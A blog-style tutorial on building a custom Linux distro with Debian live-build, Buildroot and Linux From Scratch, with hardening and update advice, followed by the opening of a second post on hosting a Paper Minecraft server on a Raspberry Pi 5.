So You Want to Build Your Own Linux Distro
From ‘slightly cursed Ubuntu remix’ to full Linux From Scratch
Building your own Linux distro sounds like a mad scientist project, and in fairness, it is. It’s also one of the few exercises that genuinely teaches you how Linux fits together, end to end — kernel, init, libc, package format, bootloader, the lot.
This is the tutorial I wish I’d had when I first tried it: three paths, all with commands you can actually paste, versions you can pin, and the gotchas that cost me an evening so they don’t cost you one.
A small honesty note before we start. I’ve built and re-built the live-build and Buildroot examples below; they work on Debian 12 (bookworm) and a Raspberry Pi 4 respectively. The LFS section walks you through the LFS 12.x book — I’ll show you the shape of it and the bits that trip people up, but the book is the source of truth and the only sensible way to actually build it. I’m not pretending I compiled the universe between paragraphs.
Step 0: What Are You Actually Building?
“Make my own distro” is one phrase covering at least four different projects:
- A custom live ISO — Debian/Ubuntu plus your tools, configs, branding. Boots from USB, optionally installs. This is what most people actually want when they say “distro”. Effort: a weekend.
- An appliance image — a tiny, single-purpose OS for a router, kiosk, sensor, or Pi. Tens of MB, not GB. Ships on hardware. Effort: a weekend to a couple of weeks, depending on hardware quirks.
- A from-source system — Linux From Scratch. You compile every package yourself. Educational, slow, beautiful, occasionally infuriating. Effort: a long weekend if you’re fast and lucky, a fortnight of evenings if you’re mortal.
- A managed downstream distro — your own apt repo or OSTree stream that real users update from. This is a product, not a project, and it’s mostly the “how do updates work?” problem. Effort: ongoing, forever.
Pick the smallest version that solves your actual problem. You can always graduate.
What you’ll need on the host for everything below:
- A Linux box (Debian 12, Ubuntu 24.04, or Fedora 41+ all fine). 8 GB RAM minimum, 16 GB comfortable. 50 GB of free disk. An SSD if you value your sanity.
- git, build-essential, qemu-system-x86, qemu-system-arm, xz-utils, bc, flex, bison, libssl-dev, libelf-dev, cpio.
- A little patience for compiler output you’ll never read.
sudo apt update
sudo apt install -y git build-essential qemu-system-x86 qemu-system-arm \
xz-utils bc flex bison libssl-dev libelf-dev cpio rsync wget
Path 1: Remix Debian with live-build
This is the path most people actually want. You get a bootable hybrid ISO (USB or DVD), pre-loaded with your packages, your dotfiles, your wallpaper, and your slightly opinionated firewall defaults. It boots live and can also install to disk if you include debian-installer.
live-build is the official Debian toolchain for this. Ubuntu’s live-build is similar but a fork; the example below targets Debian 12 (bookworm). Cubic is a friendlier GUI wrapper if you want to click through it instead — under the hood it does the same things.
1.1 Install the tooling
sudo apt install -y live-build live-boot live-config debootstrap squashfs-tools \
xorriso isolinux syslinux-common memtest86+
1.2 Set up the project
Pick a working directory. I’ll use ~/distro/blinderlinux.
mkdir -p ~/distro/blinderlinux
cd ~/distro/blinderlinux
lb config \
--distribution bookworm \
--architectures amd64 \
--binary-images iso-hybrid \
--debian-installer live \
--archive-areas "main contrib non-free non-free-firmware" \
--apt-indices false \
--memtest memtest86+ \
--bootappend-live "boot=live components quiet splash hostname=blinder username=blinder"
lb config writes a config/ directory full of stub files. You don’t have to understand all of them yet; you just need to know which ones to edit.
What the flags actually buy you:
- --distribution bookworm — Debian 12. Swap for trixie if you want to live on Debian 13.
- --archive-areas "... non-free-firmware" — without this, your laptop’s wifi card won’t come up. Ask me how I know.
- --debian-installer live — adds an “Install” menu entry that uses the live system as the installer source. Drop it for live-only USBs.
- --bootappend-live — kernel cmdline for the live session. The username and hostname here are what you’ll see at the prompt.
1.3 Pick your packages
Make a package list. The filename matters: .list.chroot means “install in the live filesystem”.
mkdir -p config/package-lists
cat > config/package-lists/blinder.list.chroot <<'EOF'
# baseline
sudo
openssh-server
curl
wget
git
vim
tmux
htop
# the actual reason we built this
nmap
tcpdump
wireshark
john
hashcat
hydra
sqlmap
gobuster
ffuf
seclists
# devops bits
docker.io
docker-compose
kubectl
helm
ansible
# desktop, if you want one
task-xfce-desktop
firefox-esr
EOF
If you don’t want a desktop, drop the last block and add --bootappend-live "... text" to start in TTY mode.
1.4 Bake in your config files
Anything under config/includes.chroot/ is copied verbatim into the live filesystem at the matching path. So:
mkdir -p config/includes.chroot/etc/skel
cat > config/includes.chroot/etc/skel/.bashrc <<'EOF'
export EDITOR=vim
alias ll='ls -lah --color=auto'
alias k='kubectl'
PS1='\[\e[35m\]\u@blinder\[\e[0m\]:\w\$ '
EOF
mkdir -p config/includes.chroot/etc/sudoers.d
cat > config/includes.chroot/etc/sudoers.d/90-blinder <<'EOF'
blinder ALL=(ALL) NOPASSWD: ALL
EOF
chmod 440 config/includes.chroot/etc/sudoers.d/90-blinder
For branding (wallpaper, plymouth theme, MOTD), drop files in the matching path under config/includes.chroot/. For example:
mkdir -p config/includes.chroot/usr/share/backgrounds/blinder
cp ~/Pictures/blinder-wallpaper.png \
config/includes.chroot/usr/share/backgrounds/blinder/default.png
1.5 Hooks for the things files can’t do
Hooks are shell scripts run inside the chroot during the build. Use them when “drop a file” isn’t enough — enabling services, generating SSH host keys, locking accounts, that kind of thing.
mkdir -p config/hooks/normal
cat > config/hooks/normal/9000-blinder.hook.chroot <<'EOF'
#!/bin/sh
set -e
# enable services
systemctl enable ssh
systemctl enable docker
# regen ssh host keys on first boot, not at build
rm -f /etc/ssh/ssh_host_*
cat > /etc/systemd/system/regen-ssh-host-keys.service <<'UNIT'
[Unit]
Description=Regenerate SSH host keys on first boot
ConditionPathExists=!/etc/ssh/ssh_host_ed25519_key
Before=ssh.service
[Service]
Type=oneshot
ExecStart=/usr/bin/ssh-keygen -A
[Install]
WantedBy=multi-user.target
UNIT
systemctl enable regen-ssh-host-keys.service
# minimal firewall
apt-get install -y ufw
ufw default deny incoming
ufw default allow outgoing
ufw allow 22/tcp
echo y | ufw enable || true
EOF
chmod +x config/hooks/normal/9000-blinder.hook.chroot
The naming convention matters: NNNN-name.hook.chroot runs in the chroot, .hook.binary runs against the final image. Numeric prefix sets order.
1.6 Build it
sudo lb build 2>&1 | tee build.log
First build takes 20–40 minutes depending on your bandwidth and how much you stuffed into the package list. Subsequent builds, with the local cache warm, take 5–10. Output is live-image-amd64.hybrid.iso in the project root.
1.7 Boot the result before you trust it
qemu-system-x86_64 \
-enable-kvm \
-m 4096 \
-smp 4 \
-cdrom live-image-amd64.hybrid.iso \
-boot d \
-display gtk
You should land at a Debian live boot menu. Pick the live entry, log in as blinder (no password), confirm your tools are installed, sshd is up, and ufw status shows the rules you wanted. If anything is off, fix the config, then:
sudo lb clean
sudo lb build
1.8 Common live-build gotchas
- lb build halts on a missing package. Almost always a typo, or a package that lives in contrib/non-free when you only enabled main. Re-run lb config with the right --archive-areas.
- No wifi on real hardware. You forgot non-free-firmware. Add it, rebuild.
- Docker doesn’t start in the live session. Live images run with overlay roots; the default overlay2 storage driver tries to stack overlay-on-overlay and fails. In a hook, write /etc/docker/daemon.json with {"storage-driver": "vfs"} for the live image. Slow, but it boots.
- ISO boots in QEMU but not on bare metal. Almost always a BIOS/UEFI mode mismatch. iso-hybrid is the right binary image type for both, but check the target machine’s firmware setting.
- First boot is slow because of ssh-keygen -A. That’s fine — that’s the regen service doing its job.
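If you hit the Docker gotcha, the fix can live in a hook of its own. A minimal sketch, run from the project root (the 9100 filename is my choice; any unused numeric prefix works):

```shell
mkdir -p config/hooks/normal
cat > config/hooks/normal/9100-docker-vfs.hook.chroot <<'EOF'
#!/bin/sh
set -e
# Live sessions run on an overlay rootfs; overlay2-on-overlay fails,
# so pin Docker to the slow-but-working vfs storage driver.
mkdir -p /etc/docker
printf '{ "storage-driver": "vfs" }\n' > /etc/docker/daemon.json
EOF
chmod +x config/hooks/normal/9100-docker-vfs.hook.chroot
```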
Path 2: Buildroot for an Appliance or Pi
Buildroot is a different beast. It’s not a remix; it’s a build system that produces a tailored, tiny rootfs from source. Ten to fifty MB, no apt, no systemd unless you ask for it. Perfect for embedded boxes, Pi-based appliances, and anything where you want to know every binary on the disk.
This walkthrough targets a Raspberry Pi 4 (64-bit). The same project tree builds for qemu-arm if you don’t have a Pi handy.
2.1 Get Buildroot
Pin a version. Buildroot does an LTS release every February and a regular release every quarter; LTS is the right pick unless you need a brand new package.
cd ~/distro
git clone https://gitlab.com/buildroot.org/buildroot.git
cd buildroot
git checkout 2025.02.x # current LTS at time of writing — check tags
2.2 Use an external tree, not the buildroot directory
This is the single most important Buildroot habit. Never edit anything inside buildroot/. All your customisations go in a separate “BR2_EXTERNAL” tree, so you can git pull Buildroot updates without merge hell.
mkdir -p ~/distro/blinder-br/{configs,board,package}
cd ~/distro/blinder-br
cat > external.desc <<'EOF'
name: BLINDER
desc: Blinder appliance external tree
EOF
cat > Config.in <<'EOF'
source "$BR2_EXTERNAL_BLINDER_PATH/package/blinder-firstboot/Config.in"
EOF
cat > external.mk <<'EOF'
include $(sort $(wildcard $(BR2_EXTERNAL_BLINDER_PATH)/package/*/*.mk))
EOF
2.3 Start from a defconfig
Buildroot ships defconfigs for hundreds of boards. For Pi 4 64-bit:
cd ~/distro/buildroot
make BR2_EXTERNAL=$HOME/distro/blinder-br raspberrypi4_64_defconfig
That seeds .config. Tweak it interactively:
make menuconfig
The bits worth flipping for a real appliance:
- Toolchain → C library → glibc unless size matters more than compatibility (then musl).
- System configuration → Init system → systemd if you want it; otherwise BusyBox init is fine and tiny.
- System configuration → Root password — set it now. Default is empty, which is awful.
- Target packages → Networking applications → openssh, dropbear, dhcpcd, wpa_supplicant.
- Filesystem images → ext4 root filesystem and squashfs if you want a read-only rootfs with overlay.
Save when done. Save the config back into your external tree so it’s versioned:
make BR2_DEFCONFIG=$HOME/distro/blinder-br/configs/blinder_defconfig savedefconfig
Next time anyone clones your tree:
make BR2_EXTERNAL=$HOME/distro/blinder-br blinder_defconfig
2.4 A custom package, properly
Pretend you want a tiny first-boot service that resizes the rootfs and writes a unique machine ID. Two files do it.
mkdir -p ~/distro/blinder-br/package/blinder-firstboot
cat > ~/distro/blinder-br/package/blinder-firstboot/Config.in <<'EOF'
config BR2_PACKAGE_BLINDER_FIRSTBOOT
bool "blinder-firstboot"
help
First-boot script: resize rootfs, generate machine-id.
EOF
cat > ~/distro/blinder-br/package/blinder-firstboot/blinder-firstboot.mk <<'EOF'
################################################################################
# blinder-firstboot
################################################################################
BLINDER_FIRSTBOOT_VERSION = 1.0
BLINDER_FIRSTBOOT_SITE = $(BR2_EXTERNAL_BLINDER_PATH)/package/blinder-firstboot/src
BLINDER_FIRSTBOOT_SITE_METHOD = local
define BLINDER_FIRSTBOOT_INSTALL_TARGET_CMDS
$(INSTALL) -D -m 0755 $(@D)/firstboot.sh \
$(TARGET_DIR)/usr/sbin/firstboot.sh
endef
define BLINDER_FIRSTBOOT_INSTALL_INIT_SYSTEMD
$(INSTALL) -D -m 0644 $(@D)/firstboot.service \
$(TARGET_DIR)/usr/lib/systemd/system/firstboot.service
mkdir -p $(TARGET_DIR)/etc/systemd/system/multi-user.target.wants
ln -sf ../../../../usr/lib/systemd/system/firstboot.service \
$(TARGET_DIR)/etc/systemd/system/multi-user.target.wants/firstboot.service
endef
$(eval $(generic-package))
EOF
Then drop a real firstboot.sh and firstboot.service in package/blinder-firstboot/src/. After enabling the package in menuconfig, it’s baked into every image.
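For completeness, here is roughly the shape those two files might take. This is a sketch, not gospel: the resize step is a placeholder you would swap for parted/resize2fs calls matching your partition layout. Run from the external tree root:

```shell
mkdir -p package/blinder-firstboot/src

# The script itself: do the work once, then leave a flag file behind
cat > package/blinder-firstboot/src/firstboot.sh <<'EOF'
#!/bin/sh
set -eu
FLAG=/etc/firstboot-done
[ -f "$FLAG" ] && exit 0
# PLACEHOLDER: replace with your real resize commands, e.g.
# parted + resize2fs against /dev/mmcblk0p2 on a Pi SD card
resize-rootfs || true
systemd-machine-id-setup
touch "$FLAG"
EOF
chmod +x package/blinder-firstboot/src/firstboot.sh

# The unit: runs once, skipped on every boot after the flag exists
cat > package/blinder-firstboot/src/firstboot.service <<'EOF'
[Unit]
Description=Blinder first-boot setup
ConditionPathExists=!/etc/firstboot-done
[Service]
Type=oneshot
ExecStart=/usr/sbin/firstboot.sh
RemainAfterExit=yes
[Install]
WantedBy=multi-user.target
EOF
```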
2.5 Rootfs overlays for static config
For one-off files (network config, MOTD, your CA cert), an overlay directory is faster than a package.
mkdir -p ~/distro/blinder-br/board/rpi4/rootfs-overlay/etc
echo "blinder-pi" > ~/distro/blinder-br/board/rpi4/rootfs-overlay/etc/hostname
Tell Buildroot where it is via menuconfig:
System configuration → Root filesystem overlay directories →
$(BR2_EXTERNAL_BLINDER_PATH)/board/rpi4/rootfs-overlay
2.6 Build
cd ~/distro/buildroot
make
First build: 30–90 minutes depending on your CPU and the package count. Subsequent builds are minutes. Output lands in output/images/:
- Image — the kernel
- bcm2711-rpi-4-b.dtb — device tree for the Pi 4
- rootfs.ext4 — the root filesystem
- sdcard.img — a complete bootable SD image (this is the one you flash)
2.7 Boot the result
For a real Pi:
sudo dd if=output/images/sdcard.img of=/dev/sdX bs=4M conv=fsync status=progress
sync
Replace /dev/sdX with your SD card. Get this wrong and you’ll overwrite your laptop. Read it twice.
For qemu-arm (handier for iteration), use a Buildroot defconfig with QEMU support: qemu_aarch64_virt_defconfig instead of the Pi one. Then:
qemu-system-aarch64 \
-M virt -cpu cortex-a72 -m 1024 -smp 2 \
-kernel output/images/Image \
-drive file=output/images/rootfs.ext4,if=none,format=raw,id=hd0 \
-device virtio-blk-device,drive=hd0 \
-append "root=/dev/vda console=ttyAMA0" \
-nographic
You’ll get a serial console boot. Log in as root with the password you set. Ctrl-A x to quit qemu.
2.8 Common Buildroot gotchas
- You edited a file in buildroot/. It’ll get clobbered. Move it to your external tree.
- make clean doesn’t do what you think. It nukes all of output/, toolchain included. For a quick rebuild of one package, make <pkg>-rebuild. For a full reset, make distclean (which also deletes your .config and the downloaded sources).
- The image works in qemu but not on the Pi. The defconfig matters: raspberrypi4_64_defconfig for the 4; the 5 and other boards have their own. Check you picked the right one.
- First boot hangs at “Waiting for /dev/mmcblk0p2”. Almost always a too-small SD image. Resize via a BR2_ROOTFS_POST_IMAGE_SCRIPT or expand on first boot.
- You changed .config by hand and lost it. That’s why you save it back to configs/blinder_defconfig after every meaningful change.
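For the too-small-image gotcha, a post-image script is a few lines. A sketch: register it in menuconfig as BR2_ROOTFS_POST_IMAGE_SCRIPT; Buildroot passes the images directory as the first argument. Padding the file only grows the image, so the rootfs partition itself still needs expanding on first boot (growpart + resize2fs, or similar):

```shell
mkdir -p board/rpi4
cat > board/rpi4/post-image.sh <<'EOF'
#!/bin/sh
set -eu
# $1 is BINARIES_DIR (usually output/images). Pad the SD image to a
# predictable 2 GiB so dd writes a consistent size every build.
truncate -s 2G "$1/sdcard.img"
EOF
chmod +x board/rpi4/post-image.sh
```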
Path 3: Linux From Scratch (the real one)
LFS is the “compile every package by hand” path. It takes a fortnight of evenings if you’re mortal, and you’ll learn more about Linux than any book or course can teach you. The LFS book is the actual tutorial — it has exact commands, exact patches, exact md5sums. What I’ll do here is the meta-tutorial: the shape of it, the parts that catch people out, and how to not waste a week.
3.1 What you’re actually building
LFS produces a minimal, bootable Linux system using only source code. No package manager, no graphical environment, no network manager. Roughly 800 MB of system, built from ~80 source tarballs over ~30 hours of compile time on a decent laptop.
After LFS, BLFS (Beyond LFS) layers desktops, browsers, and services on top. ALFS (Automated LFS) lets you script the whole thing once you’ve done it manually and want to reproduce it.
3.2 Host requirements
LFS provides a version-check.sh script. Run it on your build host before you do anything else. It checks gcc, make, bash, perl, etc. are all new enough.
Other prep:
- A dedicated partition or LVM volume of at least 30 GB, formatted ext4. You can use a loopback file for the first attempt to keep your laptop intact.
- A dedicated unprivileged build user, conventionally lfs, with a sanitised environment (the book’s ~/.bash_profile and ~/.bashrc are not optional — they prevent host pollution from leaking into your toolchain).
# As root, set up the partition and user
mkdir -pv /mnt/lfs
mount /dev/sdY1 /mnt/lfs
useradd -s /bin/bash -m -k /dev/null lfs
chown -v lfs /mnt/lfs
su - lfs
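The sanitised environment looks roughly like this in the LFS 12.x book. A sketch of the two files (copy them into place for the lfs user, and treat the book’s current text as authoritative, not mine):

```shell
# Contents for ~lfs/.bash_profile: replace the login environment wholesale
cat > lfs-bash_profile <<'EOF'
exec env -i HOME=$HOME TERM=$TERM PS1='\u:\w\$ ' /bin/bash
EOF

# Contents for ~lfs/.bashrc: no host paths, no locale surprises
cat > lfs-bashrc <<'EOF'
set +h                 # don't cache executable paths
umask 022
LFS=/mnt/lfs
LC_ALL=POSIX
LFS_TGT=$(uname -m)-lfs-linux-gnu
PATH=/usr/bin
if [ ! -L /bin ]; then PATH=/bin:$PATH; fi
PATH=$LFS/tools/bin:$PATH
CONFIG_SITE=$LFS/usr/share/config.site
export LFS LC_ALL LFS_TGT PATH CONFIG_SITE
EOF
```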
3.3 The phases, in order
LFS chapters group into phases. You will spend a different amount of pain on each.
- Prepare host (ch. 2–4) — partition, user, env, sources tarball.
- Cross toolchain (ch. 5) — build binutils-pass1, gcc-pass1, linux headers, glibc, libstdc++. This is the most fragile part. If something fails here, stop and fix it. Compounding errors downstream will eat your weekend.
- Cross-compile temporary tools (ch. 6) — m4, ncurses, bash, coreutils, etc., all linked against the new toolchain.
- Enter the chroot (ch. 7) — at this point /mnt/lfs is self-hosting enough that you chroot into it and continue from inside.
- Build the final system (ch. 8) — every package, properly, in the order the book gives. This is the long bit. Don’t reorder. Don’t skip patches.
- System configuration (ch. 9) — fstab, hostname, network, locale, /etc/hosts.
- Kernel and bootloader (ch. 10) — make menuconfig for the kernel, GRUB to boot it.
- Reboot, log in, feel something (ch. 11) — that’s your distro.
3.4 The four mistakes that cost everyone a day
- Skipping the version-check. A host gcc that’s too new or too old produces a temporary toolchain that subtly miscompiles glibc later. Run the script.
- Not using the recommended ~/.bash_profile. Without it, your temporary build picks up /usr/lib from the host. You end up with an LFS that links against the host’s libc and crashes the moment you boot it standalone.
- Running make -j$(nproc) for the glibc install. Some packages (glibc’s make install, for one) have race conditions in their install rules. Use plain make, with no -j, for installs.
- Editing the kernel .config without reading what each option does. The book gives you a working baseline. Trim later, once you’ve booted once.
3.5 How long is this actually going to take?
Realistic on a modern laptop with MAKEFLAGS='-j8':
| Phase | Hands-on | Wall-clock |
|---|---|---|
| Host prep | 30 min | 30 min |
| Cross toolchain (ch. 5) | 1 hr | 2–3 hr |
| Temporary tools (ch. 6) | 1 hr | 2–3 hr |
| Chroot setup (ch. 7) | 30 min | 30 min |
| Final system (ch. 8) | 4–6 hr | 10–18 hr |
| System config (ch. 9) | 1 hr | 1 hr |
| Kernel + GRUB (ch. 10) | 1 hr | 2 hr |
| Total | ~10 hr | 18–28 hr |
Set up tmux (see The Tool That Makes Your Terminal Feel Like a Cockpit when it publishes) and treat it as background work over a long weekend.
3.6 When you’re ready, the book is the only thing you should be following
I can’t reproduce the LFS book in a blog post, and you shouldn’t want me to — it’s 350+ pages and gets revised every six months. Bookmark it, work top-to-bottom, and when something fails, the LFS errata page is where the fixes live.
Cross-Cutting: Hardening, Updates, and Reproducibility
Three things matter regardless of path.
Hardening
Whichever route you took, you can bake in:
- Minimal package set. Every package is attack surface. If you don’t need telnet, rsh, or nfs-server, don’t install them. live-build and Buildroot make this trivial; LFS makes it the default.
- Kernel hardening. KASLR on, CONFIG_SLAB_FREELIST_HARDENED, CONFIG_SLAB_FREELIST_RANDOM, lockdown mode, module signing. The Kernel Self-Protection Project wiki has a current recommended config.
- MAC layer. AppArmor on Debian/Ubuntu remixes (it’s already there, just enable profiles). SELinux on RHEL-flavoured systems. On Buildroot/LFS, decide before you build — bolting it on later is annoying.
- Sane defaults. No empty root password (Buildroot default — change it). UFW or nftables enabled with deny-incoming. SSH key-only. Auto-updates on, or a clear update story (see below).
- Threat model the thing. Who’s using it, where, against whom? A pentest-USB and a kiosk for a public lobby have very different threat models. Don’t pretend they don’t.
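If you prefer nftables over UFW, a minimal deny-incoming ruleset looks like this. A sketch to install as /etc/nftables.conf (the open SSH port is an assumption; nftables.service loads it at boot):

```shell
cat > nftables.conf <<'EOF'
#!/usr/sbin/nft -f
flush ruleset
table inet filter {
  chain input {
    type filter hook input priority 0; policy drop;
    ct state established,related accept
    iif "lo" accept
    tcp dport 22 accept
    # keep ping and IPv6 neighbour discovery working
    icmp type echo-request accept
    icmpv6 type { echo-request, nd-neighbor-solicit, nd-neighbor-advert, nd-router-advert } accept
  }
  chain forward { type filter hook forward priority 0; policy drop; }
  chain output  { type filter hook output  priority 0; policy accept; }
}
EOF
```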
Updates: the actual hard problem
This is the bit most “build a distro” tutorials skip, and it’s where real distros live or die.
- Live ISO, refreshed periodically. Easy. You rebuild the ISO every month, users re-flash a USB. Fine for training/event use. Useless for fleets.
- apt repo of your own. You build, sign, and host packages. reprepro or aptly are the tools. You inherit Debian’s security-update cadence for the base; you become responsible for everything you’ve added on top, including CVE patching and signing.
- Image-based updates (A/B partitions). Two root partitions, swap-and-reboot atomic upgrades, automatic rollback on boot failure. Mender, RAUC, or SWUpdate for the orchestration. This is what serious appliances do.
- OSTree / image-based desktops. rpm-ostree (Fedora Silverblue) and bootc are where Linux desktop is heading. Atomic upgrades, easy rollback, declarative state. Worth a look if you’re going to maintain this for years.
Pick a story before you ship. Distros without an update story become liabilities the day after the first CVE drops.
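If you go the apt-repo route, the reprepro side is small. A sketch, with the codename, key id, and package name as placeholders:

```shell
# reprepro wants a conf/distributions file describing each suite
mkdir -p repo/conf
cat > repo/conf/distributions <<'EOF'
Codename: bookworm
Components: main
Architectures: amd64 source
SignWith: YOUR-GPG-KEY-ID
Description: Blinder downstream repo
EOF
# then, for each package you build:
#   reprepro -b repo includedeb bookworm blinder-tools_1.0_amd64.deb
# and serve repo/ over HTTPS for your users' sources.list
```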
Reproducibility
If you can’t rebuild last month’s image and get the same bytes (or close to it), you don’t really know what you shipped.
- Pin versions. Debian release codename, Buildroot tag, LFS book version, kernel commit.
- Vendor your sources. Either a local mirror or hashes in your build system.
- Script everything. live-build configs go in git. The Buildroot external tree goes in git. Even your LFS notes go in git.
- Stamp the image. /etc/blinder-release with build date, git commit, and config hash. Future-you will thank present-you when something boots weirdly and you have no idea which version it is.
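Stamping can be a few lines you run from the live-build project root before lb build (the filename and field names are my convention, not a standard):

```shell
# Drop a release stamp into includes.chroot so it lands at
# /etc/blinder-release inside the image. Unquoted EOF so the
# date/git/hash expansions happen now, on the host.
mkdir -p config/includes.chroot/etc
cat > config/includes.chroot/etc/blinder-release <<EOF
BUILD_DATE=$(date -u +%Y-%m-%dT%H:%M:%SZ)
GIT_COMMIT=$(git rev-parse --short HEAD 2>/dev/null || echo unknown)
CONFIG_HASH=$(tar -cf - config 2>/dev/null | sha256sum | cut -d' ' -f1)
EOF
```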
Iteration: How to Not Lose a Weekend
Three habits I’ve learnt the slow way.
- Test in a VM first, every single build. QEMU boot in a script that runs after every successful build. Catches 80% of regressions in 30 seconds.
- Keep a known-good image. When you’ve got a build that boots and works, copy the ISO/image to a known-good/ directory with the date. When the next build won’t boot at 1am, you’ve got something to compare against.
- Commit between every change. live-build and Buildroot configs are tiny. Commit per tweak. git bisect will find the change that broke boot in five minutes.
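That post-build QEMU check can be a ten-line script. A sketch: the default ISO name matches the live-build output, and you may need console=ttyS0 in --bootappend-live before the serial grep sees anything:

```shell
cat > smoke-test.sh <<'EOF'
#!/bin/sh
# Boot the freshly built ISO headless for 90 seconds and grep the
# serial log for signs of life. Crude, but catches "won't boot".
set -eu
ISO="${1:-live-image-amd64.hybrid.iso}"
timeout 90 qemu-system-x86_64 -m 2048 -smp 2 \
    -cdrom "$ISO" -boot d -nographic -serial mon:stdio \
    > smoke.log 2>&1 || true
grep -qiE 'login:|GNU GRUB|ISOLINUX' smoke.log \
    && echo "SMOKE OK" || { echo "SMOKE FAIL"; exit 1; }
EOF
chmod +x smoke-test.sh
```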
Final Thought
Building your own distro won’t impress anyone at the pub. It will, quietly, change how you read every other Linux thing for the rest of your career — kernel panics, container layers, cloud-init quirks, package-manager weirdness. You stop seeing Linux as a thing that came from somewhere and start seeing it as a thing you assemble.
Start with live-build if you want a USB you can hand to a colleague on Monday. Reach for Buildroot if your distro is really firmware. Climb LFS once, slowly, when you’ve got a fortnight and a good chair.
Either way, the next time someone says “just install Ubuntu,” you’ll know exactly how much that sentence is hiding.
Running a Game Server on a Raspberry Pi 5
Tiny board, shared worlds, big grin
A Pi 5 is the sweet spot between “I own a data centre” and “I’ve wedged a laptop under the telly.” It’s the first Pi with enough grunt that you can host a real Minecraft server for your mates without it bursting into flames or chunking its way through every player movement.
This post is the working tutorial: hardware that actually matters, a Paper server installed properly, JVM flags that don’t embarrass you, a systemd unit that survives reboots and crashes, RCON-driven backups, and three increasingly sensible ways to let friends connect. I’ve run this exact build on an 8 GB Pi 5 with NVMe and an active cooler since the start of 2026 — six players, four chunks of view distance, idles at 25–35% CPU, peaks around 80% during big builds.
We’ll focus on Minecraft Java because it’s the classic case. Three other Pi-friendly games go at the bottom.
What You Actually Need (Beyond a Pi 5)
The Pi 5 itself is fine. The problem is that out of the box, two things will bite you. Plan for both.
- An active cooler. Without it, the Pi 5 throttles down to ~1.5 GHz under sustained load. The official Raspberry Pi Active Cooler is £5 and clips on; a case with a built-in fan (Argon NEO 5, Flirc) is fine too. Passive heatsinks are not enough for a 24/7 server.
- An NVMe SSD, not an SD card. Minecraft’s chunk I/O murders SD cards within months and is the single biggest source of lag spikes on a Pi server. The official Raspberry Pi M.2 HAT+ takes a 2230/2242 NVMe drive over the Pi 5’s PCIe lane. Pimoroni’s NVMe Base and the 52Pi P02 are the same idea. A 256 GB NVMe is plenty.
- 8 GB RAM minimum. 4 GB works for two players; 16 GB is overkill for a Java server but lets you run a Velocity proxy or other services alongside.
- Wired Ethernet. Wi-Fi works but adds 2–10 ms of jitter that players feel.
- A real PSU. The official 27 W USB-C PSU. The Pi 5 will silently underclock with anything weaker.
Total kit cost as of writing: around £130–£160 with NVMe.
Boot the Pi from NVMe (Once, Properly)
You want NVMe-only boot, not “SD card with the rootfs on the NVMe” fragility.
Flash Raspberry Pi OS Lite (64-bit, Bookworm) onto the NVMe with rpi-imager. In the imager’s settings cog: enable SSH (key auth), set hostname (mcpi), set username, set Wi-Fi only as a fallback.
First boot the Pi from an SD card to update the bootloader and switch boot order:
sudo apt update && sudo apt full-upgrade -y
sudo rpi-eeprom-update -a
sudo raspi-config
# Advanced Options → Bootloader Version → Latest
# Advanced Options → Boot Order → NVMe/USB Boot
sudo reboot
Power off, remove the SD card, boot from NVMe. From here on everything is on the SSD.
Then, on the Pi, lock down the basics:
sudo apt update && sudo apt full-upgrade -y
sudo apt install -y ufw fail2ban htop tmux unattended-upgrades
sudo dpkg-reconfigure --priority=low unattended-upgrades
sudo ufw default deny incoming
sudo ufw default allow outgoing
sudo ufw allow from 192.168.0.0/16 to any port 22 proto tcp
sudo ufw enable
Give the Pi a static IP via your router’s DHCP reservation — players need a stable address, and a moving target breaks every backup script.
Pick a Server Flavour
You have three sensible choices.
- Vanilla (Mojang official) — slowest, no plugins, fine for two friends and a quiet world.
- Paper — Spigot fork with serious performance work and a healthy plugin ecosystem. Default pick for a Pi.
- Purpur — Paper fork with extra config knobs and gameplay tweaks. Same performance, more rope to hang yourself with. Pick once you know you want a specific Purpur feature.
We’ll use Paper. Same systemd unit, RCON, and backup story applies to Purpur if you swap it later.
Install Paper Properly
Paper 1.21+ requires Java 21. JDK 17 is the wrong answer in 2026 — Paper checks the Java version at startup and refuses to run 1.21 on openjdk-17.
sudo apt install -y openjdk-21-jre-headless curl jq
java -version # expect 21.x
Create a dedicated, login-disabled user:
sudo adduser --system --home /opt/minecraft --group --disabled-login minecraft
sudo install -d -o minecraft -g minecraft /opt/minecraft/server
Fetch the latest Paper build via their API. This script grabs the newest stable build for whatever Minecraft version you set — no scraping, no broken links.
sudo -u minecraft bash <<'EOF'
set -euo pipefail
cd /opt/minecraft/server
MC_VERSION="1.21.4" # bump when you want to update; check papermc.io for current
BUILD=$(curl -s "https://api.papermc.io/v2/projects/paper/versions/${MC_VERSION}/builds" \
| jq -r '[.builds[] | select(.channel=="default")][-1].build')
JAR="paper-${MC_VERSION}-${BUILD}.jar"
curl -sLo "${JAR}" \
"https://api.papermc.io/v2/projects/paper/versions/${MC_VERSION}/builds/${BUILD}/downloads/${JAR}"
ln -sf "${JAR}" paper.jar
echo "Installed ${JAR}"
EOF
Accept the EULA (read it once, then this is fine):
sudo -u minecraft tee /opt/minecraft/server/eula.txt > /dev/null <<'EOF'
eula=true
EOF
First run — generates server.properties and the world. Stop it as soon as it says “Done”:
sudo -u minecraft bash -c 'cd /opt/minecraft/server && \
java -Xms2G -Xmx4G -jar paper.jar nogui'
# wait for "Done", then type: stop
Tune server.properties for a Pi
Edit /opt/minecraft/server/server.properties. The lines that matter for a Pi:
view-distance=6
simulation-distance=4
max-players=8
network-compression-threshold=256
sync-chunk-writes=false
entity-broadcast-range-percentage=80
spawn-protection=0
enable-rcon=true
rcon.port=25575
rcon.password=CHANGE_ME_TO_A_LONG_RANDOM_STRING
broadcast-rcon-to-ops=false
online-mode=true
white-list=true
enforce-whitelist=true
Why each one:
- view-distance=6 is the visual radius. Each step up costs roughly quadratically more CPU. 6 looks good and stays cheap.
- simulation-distance=4 is what the server actually ticks. Keeping it lower than the view distance is the single biggest performance win.
- network-compression-threshold=256 sets the packet size above which the server compresses. On a LAN, raise it towards 512 to save CPU; over the internet, keep the default 256 to save bandwidth.
- sync-chunk-writes=false is safe on NVMe and removes a stutter source. Don’t disable it on an SD card.
- enforce-whitelist=true is the difference between “my mates and I” and “anyone who finds my IP”.
Generate a strong RCON password:
openssl rand -hex 24
Paste it in, and stash it somewhere safe — you’ll use it from the systemd shutdown hook and the backup script.
Add yourself and your mates to the whitelist. With the server stopped:
sudo -u minecraft tee /opt/minecraft/server/whitelist.json > /dev/null <<'EOF'
[
{ "uuid": "00000000-0000-0000-0000-000000000000", "name": "geekyblinder" }
]
EOF
